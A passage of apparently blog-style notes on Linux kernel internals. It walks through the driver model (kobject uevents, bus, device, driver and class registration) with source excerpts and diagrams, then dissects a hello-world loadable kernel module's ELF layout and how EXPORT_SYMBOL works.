The only interesting thing is ‘kobject_uevent’, this is used to send an event to userspace that something about kobject has happened, KOBJ_ADD for this example. So if one kobject doen’t belong to no kset, he can’t send such event to userspace. Below show the relation between kset and kobject.

                   kset
                   +-----------+-----+
    uevent_ops<----+     |kobj |     |
                   |     |     |     |
                   +-----+--+--+-----+
                            ^
                            |parent
                   kset     |
                   +--------+--+-----+
    uevent_ops<----+     |kobj |     |
            + +----+     |     |     |
            |      +-----+-----+-----+
        list|     ^
            |     |kset
            v     |
            +-----+     +-----+        +-----+
            |kobj +---> |kobj +------> |kobj |
            |     |     |     |        |     |
            +-----+     +--+--+        +-----+
                           ^
                           |parent
                           |
                        +--+--+
                        |kobj |
                        |     |
                        +-----+

uevent and call_usermodehelper

Hotplug mechanism can be considered as follows, when one device plug into the system , the kernel can notify the userspace program and the userspace program can load the device’s driver, when it removes, it can remove the driver. There ares two methods to notify the userspace, one is udev and the other is /sbin/hotplug. Both need the kernel’s support, kobject_uevent’. This function is the base of udev or /sbin/hotplug, it can send uevent or call call_usermodehelper function to create a user process.

int kobject_uevent(struct kobject *kobj, enum kobject_action action)
{
 return kobject_uevent_env(kobj, action, NULL);
}

int kobject_uevent_env(struct kobject *kobj, enum kobject_action action,
         char *envp_ext[])
{
 struct kobj_uevent_env *env;
 const char *action_string = kobject_actions[action];
 const char *devpath = NULL;
 const char *subsystem;
 struct kobject *top_kobj;
 struct kset *kset;
 const struct kset_uevent_ops *uevent_ops;
 int i = 0;
 int retval = 0;
#ifdef CONFIG_NET
 struct uevent_sock *ue_sk;
#endif

 pr_debug("kobject: '%s' (%p): %s\n",
  kobject_name(kobj), kobj, __func__);

 /* search the kset we belong to */
 top_kobj = kobj;
 while (!top_kobj->kset && top_kobj->parent)
  top_kobj = top_kobj->parent;

 if (!top_kobj->kset) {
  pr_debug("kobject: '%s' (%p): %s: attempted to send uevent "
   "without kset!\n", kobject_name(kobj), kobj,
   __func__);
  return -EINVAL;
 }

 kset = top_kobj->kset;
 uevent_ops = kset->uevent_ops;

 /* skip the event, if uevent_suppress is set*/
 if (kobj->uevent_suppress) {
  pr_debug("kobject: '%s' (%p): %s: uevent_suppress "
    "caused the event to drop!\n",
    kobject_name(kobj), kobj, __func__);
  return 0;
 }
 /* skip the event, if the filter returns zero. */
 if (uevent_ops && uevent_ops->filter)
  if (!uevent_ops->filter(kset, kobj)) {
   pr_debug("kobject: '%s' (%p): %s: filter function "
    "caused the event to drop!\n",
    kobject_name(kobj), kobj, __func__);
   return 0;
  }
 /* default keys */
 retval = add_uevent_var(env, "ACTION=%s", action_string);
 if (retval)
  goto exit;
 retval = add_uevent_var(env, "DEVPATH=%s", devpath);
 if (retval)
  goto exit;
 retval = add_uevent_var(env, "SUBSYSTEM=%s", subsystem);
 if (retval)
  goto exit;

 /* let the kset specific function add its stuff */
 if (uevent_ops && uevent_ops->uevent) {
  retval = uevent_ops->uevent(kset, kobj, env);
  if (retval) {
   pr_debug("kobject: '%s' (%p): %s: uevent() returned "
    "%d\n", kobject_name(kobj), kobj,
    __func__, retval);
   goto exit;
  }
 }

 /*
#if defined(CONFIG_NET)
 /* send netlink message */
 list_for_each_entry(ue_sk, &uevent_sock_list, list) {
  struct sock *uevent_sock = ue_sk->sk;
  struct sk_buff *skb;
  size_t len;

  if (!netlink_has_listeners(uevent_sock, 1))
   continue;

  /* allocate message with the maximum possible size */
  len = strlen(action_string) + strlen(devpath) + 2;
  skb = alloc_skb(len + env->buflen, GFP_KERNEL);
  if (skb) {
   char *scratch;

   /* add header */
   scratch = skb_put(skb, len);
   sprintf(scratch, "%s@%s", action_string, devpath);

   /* copy keys to our continuous event payload buffer */
   for (i = 0; i < env->envp_idx; i++) {
    len = strlen(env->envp[i]) + 1;
    scratch = skb_put(skb, len);
    strcpy(scratch, env->envp[i]);
   }

   NETLINK_CB(skb).dst_group = 1;
   retval = netlink_broadcast_filtered(uevent_sock, skb,
           0, 1, GFP_KERNEL,
           kobj_bcast_filter,
           kobj);
   /* ENOBUFS should be handled in userspace */
   if (retval == -ENOBUFS || retval == -ESRCH)
    retval = 0;
  } else
   retval = -ENOMEM;
 }
#endif
 mutex_unlock(&uevent_sock_mutex);

 /* call uevent_helper, usually only enabled during early boot */
 if (uevent_helper[0] && !kobj_usermode_filter(kobj)) {
  char *argv [3];

  argv [0] = uevent_helper;
  argv [1] = (char *)subsystem;
  argv [2] = NULL;
  retval = add_uevent_var(env, "HOME=/");
  if (retval)
   goto exit;
  retval = add_uevent_var(env,
     "PATH=/sbin:/bin:/usr/sbin:/usr/bin");
  if (retval)
   goto exit;

  retval = call_usermodehelper(argv[0], argv,
          env->envp, UMH_WAIT_EXEC);
 }

exit:
 kfree(devpath);
 kfree(env);
 return retval;
}

Generally, there are three steps in kobject_uevent_env. Firstly, find the top kset, then call the filter of kset->uevent_ops. Secondly, set the environment variable and call uevent_ops->uevent. Finally, according the definition of CONFIG_NET it will send uevent message to userspace using netlink, or call the call_usermodehelper function to launch a userprocess from kernel.

bus

Bus is one of the core concept in linux device driver. Devices and drivers is around of bus. Bus is a very low level infrastructure that device driver programmer have nearly chance to write a bus. A bus can be both backed by a physical bus such as PCI bus or just a virtual concept bus such as virtio bus.

struct bus_type {
 const char  *name;
 const char  *dev_name;
 struct device  *dev_root;
 struct device_attribute *dev_attrs; /* use dev_groups instead */
 const struct attribute_group **bus_groups;
 const struct attribute_group **dev_groups;
 const struct attribute_group **drv_groups;

 int (*match)(struct device *dev, struct device_driver *drv);
 int (*uevent)(struct device *dev, struct kobj_uevent_env *env);
 int (*probe)(struct device *dev);
 int (*remove)(struct device *dev);
 void (*shutdown)(struct device *dev);

 int (*online)(struct device *dev);
 int (*offline)(struct device *dev);

 int (*suspend)(struct device *dev, pm_message_t state);
 int (*resume)(struct device *dev);

 const struct dev_pm_ops *pm;

 struct iommu_ops *iommu_ops;

 struct subsys_private *p;
 struct lock_class_key lock_key;
};

‘match’ was called whenever a new device or driver is added for this bus. the ‘p’, struct subsys_private is used to manage the devices and drivers in this bus.

struct subsys_private {
 struct kset subsys;
 struct kset *devices_kset;
 struct list_head interfaces;
 struct mutex mutex;

 struct kset *drivers_kset;
 struct klist klist_devices;
 struct klist klist_drivers;
 struct blocking_notifier_head bus_notifier;
 unsigned int drivers_autoprobe:1;
 struct bus_type *bus;

 struct kset glue_dirs;
 struct class *class;
};

’ subsys’ represents the subsystem of the bus lies, every bus in system through bus_register will be has the same bus_kset, so bus_kset is the container of all buses in the system. ‘devices_kset’ represents all the devices’ kset, and ‘drivers_kset’ represents all the drivers’s kset. ‘klist_devices’ and ‘klist_drivers’ links the devices and drivers in this bus.

     bus_type
    +--------+
    | name   |                           bus_kset
    +--------+                           +--------------+
    |        |                           |    |kobj|    |
    +--------+                           +--------------+
    |        |                           ^
    +--------+                           |     dri^ers_kset
    |  p     |     subsys_pri^ate        |     +--------------+
    +--+-----+---> +---------------+     |     |    |kobj|    |
       ^           |   subsys      +-----+     +--------------+
       |           +---------------+          ^
       |           | drivers_kset  +----------+
       |           +---------------+                de^ices_kset
       |           | devices_kset  +--------------> +--------------+
       |           +---------------+                |    |kobj|    |
       |           | klist_devices +-------+ de^    +--------------+
       |           +---------------+       <----+      +----+      +----+
       |           | klist_drivers +--+    |    +----> |    +----> |    |
       |           +---------------+  |    +----+      +----+      +----+
       |           |               |  |    drv
       |           +---------------+  +--> +----+      +----+      +----+
       +-----------+  bus          |       |    +----> |    +----> |    |
                   +---------------+       +----+      +----+      +----+

‘bus_register’ is used to register a bus to the system.

int bus_register(struct bus_type *bus)
{
 int retval;
 struct subsys_private *priv;
 struct lock_class_key *key = &bus->lock_key;

 priv = kzalloc(sizeof(struct subsys_private), GFP_KERNEL);
 if (!priv)
  return -ENOMEM;

 priv->bus = bus;
 bus->p = priv;

 BLOCKING_INIT_NOTIFIER_HEAD(&priv->bus_notifier);

 retval = kobject_set_name(&priv->subsys.kobj, "%s", bus->name);
 if (retval)
  goto out;

 priv->subsys.kobj.kset = bus_kset;
 priv->subsys.kobj.ktype = &bus_ktype;
 priv->drivers_autoprobe = 1;

 retval = kset_register(&priv->subsys);
 if (retval)
  goto out;

 retval = bus_create_file(bus, &bus_attr_uevent);
 if (retval)
  goto bus_uevent_fail;

 priv->devices_kset = kset_create_and_add("devices", NULL,
      &priv->subsys.kobj);
 if (!priv->devices_kset) {
  retval = -ENOMEM;
  goto bus_devices_fail;
 }

 priv->drivers_kset = kset_create_and_add("drivers", NULL,
      &priv->subsys.kobj);
 if (!priv->drivers_kset) {
  retval = -ENOMEM;
  goto bus_drivers_fail;
 }

 INIT_LIST_HEAD(&priv->interfaces);
 __mutex_init(&priv->mutex, "subsys mutex", key);
 klist_init(&priv->klist_devices, klist_devices_get, klist_devices_put);
 klist_init(&priv->klist_drivers, NULL, NULL);

 retval = add_probe_files(bus);
 if (retval)
  goto bus_probe_files_fail;

 retval = bus_add_groups(bus, bus->bus_groups);
 if (retval)
  goto bus_groups_fail;

 pr_debug("bus: '%s': registered\n", bus->name);
 return 0;
 ...
 return retval;
}

First, ‘kset_register’ create a directory in /sys/bus, for example, /sys/bus/pci. Then create two directory —-devices and drivers—-in /sys/bus/$bus using ‘kset_create_and_add’. For example /sys/bus/pci/devices and /sys/bus/pci/drivers.

Bus’ attributes represnet the information and configuration about the bus.

    bus_create_file(bus, &bus_attr_uevent);

BUS_ATTR is used to create bus attributes:

static BUS_ATTR(uevent, S_IWUSR, NULL, bus_uevent_store);

#define BUS_ATTR(_name, _mode, _show, _store) \
 struct bus_attribute bus_attr_##_name = __ATTR(_name, _mode, _show, _store)
#define BUS_ATTR_RW(_name) \
 struct bus_attribute bus_attr_##_name = __ATTR_RW(_name)
#define BUS_ATTR_RO(_name) \
 struct bus_attribute bus_attr_##_name = __ATTR_RO(_name)

User space can read/write these attributes to control bus’s behavior.

binding the device and driver

Connect the device and his corresponding driver is called binding. The bus does a lot of work to bind device and driver behind of the device driver progreammer. There are two events that will cause the bind. When one device is registered into a bus by device_register, the kernel will try to bind this device with every drivers registered in this bus. When one driver is registered into a bus by driver_registered, the kernel will try to bind this driver with every devices registered in this bus.

  int device_bind_driver(struct device *dev)
  {
   int ret;
  
   ret = driver_sysfs_add(dev);
   if (!ret)
    driver_bound(dev);
   return ret;
  }
  
  static void driver_bound(struct device *dev)
  {
   if (klist_node_attached(&dev->p->knode_driver)) {
    printk(KERN_WARNING "%s: device %s already bound\n",
     __func__, kobject_name(&dev->kobj));
    return;
   }
  
   pr_debug("driver: '%s': %s: bound to device '%s'\n", dev_name(dev),
    __func__, dev->driver->name);
  
   klist_add_tail(&dev->p->knode_driver, &dev->driver->p->klist_devices);
  
   /*
   * Make sure the device is no longer in one of the deferred lists and
   * kick off retrying all pending devices
   */
   driver_deferred_probe_del(dev);
   driver_deferred_probe_trigger();
  
   if (dev->bus)
    blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
            BUS_NOTIFY_BOUND_DRIVER, dev);
  }

device_register calls driver_bound to bind the device and drivers. Links device private’s field knode_driver with the driver private’s klist_devices.

device

Linux uses struct device to represent a device.

struct device {
 struct device  *parent;

 struct device_private *p;

 struct kobject kobj;
 const char  *init_name; /* initial name of the device */
 const struct device_type *type;

 struct mutex  mutex; /* mutex to synchronize calls to
     * its driver.
     */

 struct bus_type *bus;  /* type of bus device is on */
 struct device_driver *driver; /* which driver has allocated this
        device */
 void  *platform_data; /* Platform specific data, device
        core doesn't touch it */
 struct dev_pm_info power;
 struct dev_pm_domain *pm_domain;

#ifdef CONFIG_PINCTRL
 struct dev_pin_info *pins;
#endif

#ifdef CONFIG_NUMA
 int  numa_node; /* NUMA node this device is close to */
#endif
 u64  *dma_mask; /* dma mask (if dma'able device) */
 u64  coherent_dma_mask;/* Like dma_mask, but for
          alloc_coherent mappings as
          not all hardware supports
          64 bit addresses for consistent
          allocations such descriptors. */

 struct device_dma_parameters *dma_parms;

 struct list_head dma_pools; /* dma pools (if dma'ble) */

 struct dma_coherent_mem *dma_mem; /* internal for coherent mem
          override */
#ifdef CONFIG_DMA_CMA
 struct cma *cma_area;  /* contiguous memory area for dma
        allocations */
#endif
 /* arch specific additions */
 struct dev_archdata archdata;

 struct device_node *of_node; /* associated device tree node */
 struct acpi_dev_node acpi_node; /* associated ACPI device node */

 dev_t   devt; /* dev_t, creates the sysfs "dev" */
 u32   id; /* device instance */

 spinlock_t  devres_lock;
 struct list_head devres_head;

 struct klist_node knode_class;
 struct class  *class;
 const struct attribute_group **groups; /* optional groups */

 void (*release)(struct device *dev);
 struct iommu_group *iommu_group;

 bool   offline_disabled:1;
 bool   offline:1;
};

‘parent’ indicates the parent device. ‘kobj’ represent devices’ kobject in kernel. ‘driver’ indicates whether this device has been bind with the driver. if this is NULL, it doesn’t find his driver.

Every device in system is a object of struct device, so the kernel uses a kset—devices_kset as a container of devices. Kernel classify the devices as two class, one is block and the other is char. Each class has a kobject, sysfs_dev_block_kobj and sysfs_dev_char_kobj. It is initialized in “devices_init”:

int __init devices_init(void)
{
 devices_kset = kset_create_and_add("devices", &device_uevent_ops, NULL);
 if (!devices_kset)
  return -ENOMEM;
 dev_kobj = kobject_create_and_add("dev", NULL);
 if (!dev_kobj)
  goto dev_kobj_err;
 sysfs_dev_block_kobj = kobject_create_and_add("block", dev_kobj);
 if (!sysfs_dev_block_kobj)
  goto block_kobj_err;
 sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
 if (!sysfs_dev_char_kobj)
  goto char_kobj_err;

 return 0;

 char_kobj_err:
 kobject_put(sysfs_dev_block_kobj);
 block_kobj_err:
 kobject_put(dev_kobj);
 dev_kobj_err:
 kset_unregister(devices_kset);
 return -ENOMEM;
}

So this function genereates the following directory, /sys/devices, /sys/dev, /sys/dev/block and /sys/dev/char.

device_register is used to register a device into the system. First call device_initialize to initialize some field of the device and then calls device_add.

int device_register(struct device *dev)
{
 device_initialize(dev);
 return device_add(dev);
}

void device_initialize(struct device *dev)
{
 dev->kobj.kset = devices_kset;
 kobject_init(&dev->kobj, &device_ktype);
 INIT_LIST_HEAD(&dev->dma_pools);
 mutex_init(&dev->mutex);
 lockdep_set_novalidate_class(&dev->mutex);
 spin_lock_init(&dev->devres_lock);
 INIT_LIST_HEAD(&dev->devres_head);
 device_pm_init(dev);
 set_dev_node(dev, -1);
}

‘device_add’ do a lot of work. First it creates the topology in sysfs. 1) If both and ‘dev->class’ and ‘dev->parent’ is NULL and the device is attached to a buts, the parent is the bus’s device

 if (!parent && dev->bus && dev->bus->dev_root)
  return &dev->bus->dev_root->kobj;

2) If ‘dev->class’ is NULL and ‘dev->parent’ is not NULL, easy case, dev’s directory is in ‘dev->parent->kobj’

3) if ‘dev->class’ is not NULL and ‘dev->parent’ is NULL, dev’s directory is in /sys/devices/virtual

4) both ‘dev->class’ and ‘dev->parent’ is not NULL, most complicated case, omit here.

Second it creates some attribute files of this device. If its mjaor is not zero, it calls ‘devtmpfs_create_node’ to create a node in devtmpfs.

Then bind the device with all of the driver’s in the bus.

void bus_probe_device(struct device *dev)
{
 struct bus_type *bus = dev->bus;
 struct subsys_interface *sif;
 int ret;

 if (!bus)
  return;

 if (bus->p->drivers_autoprobe) {
  ret = device_attach(dev);
  WARN_ON(ret < 0);
 }

 mutex_lock(&bus->p->mutex);
 list_for_each_entry(sif, &bus->p->interfaces, node)
  if (sif->add_dev)
   sif->add_dev(dev, sif);
 mutex_unlock(&bus->p->mutex);
}

int device_attach(struct device *dev)
{
 int ret = 0;

 device_lock(dev);
 if (dev->driver) {
  if (klist_node_attached(&dev->p->knode_driver)) {
   ret = 1;
   goto out_unlock;
  }
  ret = device_bind_driver(dev);
  if (ret == 0)
   ret = 1;
  else {
   dev->driver = NULL;
   ret = 0;
  }
 } else {
  ret = bus_for_each_drv(dev->bus, NULL, dev, __device_attach);
  pm_request_idle(dev);
 }
out_unlock:
 device_unlock(dev);
 return ret;
}

If this device has a driver, we just need to call ‘device_bind_driver’ to establish the relation of device and driver. If this device has no driver, we need to iterate every drivers in ‘dev->bus’ and call __device_attach

static int __device_attach(struct device_driver *drv, void *data)
{
 struct device *dev = data;

 if (!driver_match_device(drv, dev))
  return 0;

 return driver_probe_device(drv, dev);
}

static inline int driver_match_device(struct device_driver *drv,
          struct device *dev)
{
 return drv->bus->match ? drv->bus->match(dev, drv) : 1;
}

If driver’s bus define a match method, call it. If it return 1, matchs and if return 0, not match. If the device and the driver matchs, call ‘driver_probe_device’ to bind the device and driver:

int driver_probe_device(struct device_driver *drv, struct device *dev)
{
 int ret = 0;

 if (!device_is_registered(dev))
  return -ENODEV;

 pr_debug("bus: '%s': %s: matched device %s with driver %s\n",
  drv->bus->name, __func__, dev_name(dev), drv->name);

 pm_runtime_barrier(dev);
 ret = really_probe(dev, drv);
 pm_request_idle(dev);

 return ret;
}

static int really_probe(struct device *dev, struct device_driver *drv)
{
 int ret = 0;

 atomic_inc(&probe_count);
 pr_debug("bus: '%s': %s: probing driver %s with device %s\n",
  drv->bus->name, __func__, drv->name, dev_name(dev));
 WARN_ON(!list_empty(&dev->devres_head));

 dev->driver = drv;

 /* If using pinctrl, bind pins now before probing */
 ret = pinctrl_bind_pins(dev);
 if (ret)
  goto probe_failed;

 if (driver_sysfs_add(dev)) {
  printk(KERN_ERR "%s: driver_sysfs_add(%s) failed\n",
   __func__, dev_name(dev));
  goto probe_failed;
 }

 if (dev->bus->probe) {
  ret = dev->bus->probe(dev);
  if (ret)
   goto probe_failed;
 } else if (drv->probe) {
  ret = drv->probe(dev);
  if (ret)
   goto probe_failed;
 }

 driver_bound(dev);
 ret = 1;
 pr_debug("bus: '%s': %s: bound device %s to driver %s\n",
  drv->bus->name, __func__, dev_name(dev), drv->name);
 。。。
}

If the device’s bus define a probe calls it others call athe driver’s probe function. Finally call ‘driver_bound’ to establish the relations.

driver

struct device_driver represents a device driver.

  struct device_driver {
   const char  *name;
   struct bus_type  *bus;
  
   struct module  *owner;
   const char  *mod_name; /* used for built-in modules */
  
   bool suppress_bind_attrs; /* disables bind/unbind via sysfs */
  
   const struct of_device_id *of_match_table;
   const struct acpi_device_id *acpi_match_table;
  
   int (*probe) (struct device *dev);
   int (*remove) (struct device *dev);
   void (*shutdown) (struct device *dev);
   int (*suspend) (struct device *dev, pm_message_t state);
   int (*resume) (struct device *dev);
   const struct attribute_group **groups;
  
   const struct dev_pm_ops *pm;
  
   struct driver_private *p;
  };

‘driver_find’ is used to find a driver in bus. ‘driver_register’ is used to register a driver to system.

int driver_register(struct device_driver *drv)
{
 int ret;
 struct device_driver *other;

 BUG_ON(!drv->bus->p);

 if ((drv->bus->probe && drv->probe) ||
     (drv->bus->remove && drv->remove) ||
     (drv->bus->shutdown && drv->shutdown))
  printk(KERN_WARNING "Driver '%s' needs updating - please use "
   "bus_type methods\n", drv->name);

 other = driver_find(drv->name, drv->bus);
 if (other) {
  printk(KERN_ERR "Error: Driver '%s' is already registered, "
   "aborting...\n", drv->name);
  return -EBUSY;
 }

 ret = bus_add_driver(drv);
 if (ret)
  return ret;
 ret = driver_add_groups(drv, drv->groups);
 if (ret) {
  bus_remove_driver(drv);
  return ret;
 }
 kobject_uevent(&drv->p->kobj, KOBJ_ADD);

 return ret;
}

int bus_add_driver(struct device_driver *drv)
{
 struct bus_type *bus;
 struct driver_private *priv;
 int error = 0;

 bus = bus_get(drv->bus);
 if (!bus)
  return -EINVAL;

 pr_debug("bus: '%s': add driver %s\n", bus->name, drv->name);

 priv = kzalloc(sizeof(*priv), GFP_KERNEL);
 if (!priv) {
  error = -ENOMEM;
  goto out_put_bus;
 }
 klist_init(&priv->klist_devices, NULL, NULL);
 priv->driver = drv;
 drv->p = priv;
 priv->kobj.kset = bus->p->drivers_kset;
 error = kobject_init_and_add(&priv->kobj, &driver_ktype, NULL,
         "%s", drv->name);
 if (error)
  goto out_unregister;

 klist_add_tail(&priv->knode_bus, &bus->p->klist_drivers);
 if (drv->bus->p->drivers_autoprobe) {
  error = driver_attach(drv);
  if (error)
   goto out_unregister;
 }
 module_add_driver(drv->owner, drv);

 error = driver_create_file(drv, &driver_attr_uevent);
 if (error) {
  printk(KERN_ERR "%s: uevent attr (%s) failed\n",
   __func__, drv->name);
 }
 error = driver_add_groups(drv, bus->drv_groups);
 if (error) {
  /* How the hell do we get out of this pickle? Give up */
  printk(KERN_ERR "%s: driver_create_groups(%s) failed\n",
   __func__, drv->name);
 }

 if (!drv->suppress_bind_attrs) {
  error = add_bind_files(drv);
  if (error) {
   /* Ditto */
   printk(KERN_ERR "%s: add_bind_files(%s) failed\n",
    __func__, drv->name);
  }
 }

 return 0;

out_unregister:
 kobject_put(&priv->kobj);
 kfree(drv->p);
 drv->p = NULL;
out_put_bus:
 bus_put(bus);
 return error;
}

The ‘bus_add_driver’ does the really work, first allocate and initialize a ‘driver_private’ struct. Later calls ‘driver_attach’, for every device in bus, it calls ‘__driver_attach’:

static int __driver_attach(struct device *dev, void *data)
{
 struct device_driver *drv = data;

 /*
 * Lock device and try to bind to it. We drop the error
 * here and always return 0, because we need to keep trying
 * to bind to devices and some drivers will return an error
 * simply if it didn't support the device.
 *
 * driver_probe_device() will spit a warning if there
 * is an error.
 */

 if (!driver_match_device(drv, dev))
  return 0;

 if (dev->parent) /* Needed for USB */
  device_lock(dev->parent);
 device_lock(dev);
 if (!dev->driver)
  driver_probe_device(drv, dev);
 device_unlock(dev);
 if (dev->parent)
  device_unlock(dev->parent);

 return 0;
}

In ‘__driver_attach’, it calls both ‘driver_match_device’ and ‘driver_probe_device’, the same as ‘__device_attach’.

‘bus_add_driver’ will also create some attribute files.

class

class is a highter abstract of devices, classify the devices according the devices’ functionality.

struct class {
 const char  *name;
 struct module  *owner;

 struct class_attribute  *class_attrs;
 const struct attribute_group **dev_groups;
 struct kobject   *dev_kobj;

 int (*dev_uevent)(struct device *dev, struct kobj_uevent_env *env);
 char *(*devnode)(struct device *dev, umode_t *mode);

 void (*class_release)(struct class *class);
 void (*dev_release)(struct device *dev);

 int (*suspend)(struct device *dev, pm_message_t state);
 int (*resume)(struct device *dev);

 const struct kobj_ns_type_operations *ns_type;
 const void *(*namespace)(struct device *dev);

 const struct dev_pm_ops *pm;

 struct subsys_private *p;
};

‘classes_init’ create a root directory in sysfs.

int __init classes_init(void)
{
 class_kset = kset_create_and_add("class", NULL, NULL);
 if (!class_kset)
  return -ENOMEM;
 return 0;
}

class is created using ‘class_create’

#define class_create(owner, name)  \
({      \
 static struct lock_class_key __key; \
 __class_create(owner, name, &__key); \
})

struct class *__class_create(struct module *owner, const char *name,
        struct lock_class_key *key)
{
 struct class *cls;
 int retval;

 cls = kzalloc(sizeof(*cls), GFP_KERNEL);
 if (!cls) {
  retval = -ENOMEM;
  goto error;
 }

 cls->name = name;
 cls->owner = owner;
 cls->class_release = class_create_release;

 retval = __class_register(cls, key);
 if (retval)
  goto error;

 return cls;

error:
 kfree(cls);
 return ERR_PTR(retval);
}
EXPORT_SYMBOL_GPL(__class_create);

Again, ‘__class_register’ does the tough work. It’s most important work is to create a directory in /sys/class.

Let’s see how class impose effects on device create.

struct device *device_create(struct class *class, struct device *parent,
        dev_t devt, void *drvdata, const char *fmt, ...)
{
 va_list vargs;
 struct device *dev;

 va_start(vargs, fmt);
 dev = device_create_vargs(class, parent, devt, drvdata, fmt, vargs);
 va_end(vargs);
 return dev;
}

static struct device *
device_create_groups_vargs(struct class *class, struct device *parent,
      dev_t devt, void *drvdata,
      const struct attribute_group **groups,
      const char *fmt, va_list args)
{
 struct device *dev = NULL;
 int retval = -ENODEV;

 if (class == NULL || IS_ERR(class))
  goto error;

 dev = kzalloc(sizeof(*dev), GFP_KERNEL);
 if (!dev) {
  retval = -ENOMEM;
  goto error;
 }

 dev->devt = devt;
 dev->class = class;
 dev->parent = parent;
 dev->groups = groups;
 dev->release = device_create_release;
 dev_set_drvdata(dev, drvdata);

 retval = kobject_set_name_vargs(&dev->kobj, fmt, args);
 if (retval)
  goto error;

 retval = device_register(dev);
 if (retval)
  goto error;

 return dev;

error:
 put_device(dev);
 return ERR_PTR(retval);
}

Here we see the ‘dev->class’ is set to the class. As we have discussed in ‘device_register’ the class and parent both have an influence in the device’s lying the directory.

Anatomy of the Linux loadable kernel module

2018-06-02T00:00:00+00:00

Loadable module plays a very important role in modern applications and operating systems. Nearly all processes need loadable modules, .so and .dll file for Linux and Windows for example. The operating systems can also benefit from the loadable modules, for examle , the Linux can insert .ko driver file into the kernel when it is running, also the Windows operating has the corresponding mechanism. This article will dig into the anatomy the Linux loadable kernel module. We will use the below very simple loadable kernel module to follow our discuss.

hello.c:

#include <linux/kernel.h>
#include <linux/module.h>


int testexport(void)
{
printk("in testexport\n");
}
EXPORT_SYMBOL(testexport);

int hello_init(void) {
  int i;
  printk(KERN_INFO "Hello World!\n");
  return 0;
}
void hello_exit(void) {
  printk(KERN_INFO "Bye World!\n");
}

module_init(hello_init);
module_exit(hello_exit);

Below is the Makefile:

obj-m += hello.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

When we compile the kernel module, it generates a hello.ko file. Insert the .ko into the kernel using “insmod hello.ko”, you will see the “Hello World” in dmesg, and remove it using “rmmod hello”, you will see the “Bye World”.

[469345.236572] Hello World!
[469356.544498] Bye World!

File Format

.ko is an ELF file, which stands for “Executable and Linking Format”, the standand execute file format in Linux.

# file hello.ko
hello.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=28772d0d39be18e530b2b788dbf79acfabf189d6, not strippe

Below layout the tpyical .ko file format in disk.

e_shoff  +------------------+
    +----+ ELF header       |
    |    +------------------+ <------+
    |    |                  |        |
    |    | section 1        |        |
    |    |                  |        |
    |    +------------------+        |
    |    | section 2        | <---+  |
    |    +------------------+     |  |
    |    | section 3        | <+  |  |
    +--> +------------------+  |  |  |
        | section header 1 +--------+
        +------------------+  |  |
        | section header 2 +-----+
        +------------------+  | sh_offset
        | section header 3 +--+
        +------------------+

In general, the ELF static file contains three portion, ELF header, several sections and the final several section header talbe. Notice here we omit the optional program header table as the .ko doesn’t use it.

##ELF header

ELF header describes the overall infomation of the file, lies in the first portion of the ELF file. We can use readelf to read the header.

# readelf -h hello.ko
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              REL (Relocatable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x0
  Start of program headers:          0 (bytes into file)
  Start of section headers:          285368 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           0 (bytes)
  Number of program headers:         0
  Size of section headers:           64 (bytes)
  Number of section headers:         33
  Section header string table index: 3

Use the hexdump we can see the raw data.

0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0001 003e 0001 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 5ab8 0004 0000 0000
0000030 0000 0000 0040 0000 0000 0040 0021 0020

Structure represented:

typedef struct
{
    unsigned char e_ident[16]; /* ELF identification */
    Elf64_Half e_type; /* Object file type */
    Elf64_Half e_machine; /* Machine type */
    Elf64_Word e_version; /* Object file version */
    Elf64_Addr e_entry; /* Entry point address */
    Elf64_Off e_phoff; /* Program header offset */
    Elf64_Off e_shoff; /* Section header offset */
    Elf64_Word e_flags; /* Processor-specific flags */
    Elf64_Half e_ehsize; /* ELF header size */
    Elf64_Half e_phentsize; /* Size of program header entry */
    Elf64_Half e_phnum; /* Number of program header entries */
    Elf64_Half e_shentsize; /* Size of section header entry */
    Elf64_Half e_shnum; /* Number of section header entries */
    Elf64_Half e_shstrndx; /* Section name string table index */
} Elf64_Ehdr; The comment describe every filed's meaning.

Sections

Several sections lies after the ELF header. Sections occupies the most space of ELF file. Every section is the true data about the file. For example, the .text section contains the code the program will be executed, the .data contains the data the program will use. There maybe a lot of sections, our this very simple helloworld has 33 sections. When the operating system load the ELF file into the memory, some of the sections will be togethered into a segment, and some sections may be omited, means not load into memory.

Section header tables

Section header tables lies in the tail of ELF file. It is the metadata of sections, contains the information about the corresponding section, section start in the ELF file and size for example.

EXPORT_SYMBOL internals

When we write application in user space, we often use the library functions such as ‘printf’, ‘malloc’ and so on. We don’t need write these functions by ourself as they are provided by the glic library. Also, in kernel space, the kernel module often needs use the kernel’s function to complete his work. For example, the ‘printk’ to print something. For the static linking, the compiler can solve this reference problem, but for the dynamic module load, the kernel should do this by himself, this called resolve the “unresolved reference”. Essentially process “unresolved reference” is to determine the actual address of the kernel module uses. So there must somewhere to export these symbols. In linux kernel, it is done by EXPORT_SYMBOL macro. So let’s look at how to export symbols through EXPORT_SYMBOL.

<include/linux/export.h>
/* For every exported symbol, place a struct in the __ksymtab section */
#define __EXPORT_SYMBOL(sym, sec)    \
extern typeof(sym) sym;     \
__CRC_SYMBOL(sym, sec)     \
static const char __kstrtab_##sym[]   \
__attribute__((section("__ksymtab_strings"), aligned(1))) \
= VMLINUX_SYMBOL_STR(sym);    \
extern const struct kernel_symbol __ksymtab_##sym; \
__visible const struct kernel_symbol __ksymtab_##sym \
__used       \
__attribute__((section("___ksymtab" sec "+" #sym), unused)) \
= { (unsigned long)&sym, __kstrtab_##sym }

#define EXPORT_SYMBOL(sym)     \
__EXPORT_SYMBOL(sym, "")

#define EXPORT_SYMBOL_GPL(sym)     \
__EXPORT_SYMBOL(sym, "_gpl")

#define EXPORT_SYMBOL_GPL_FUTURE(sym)    \
__EXPORT_SYMBOL(sym, "_gpl_future"

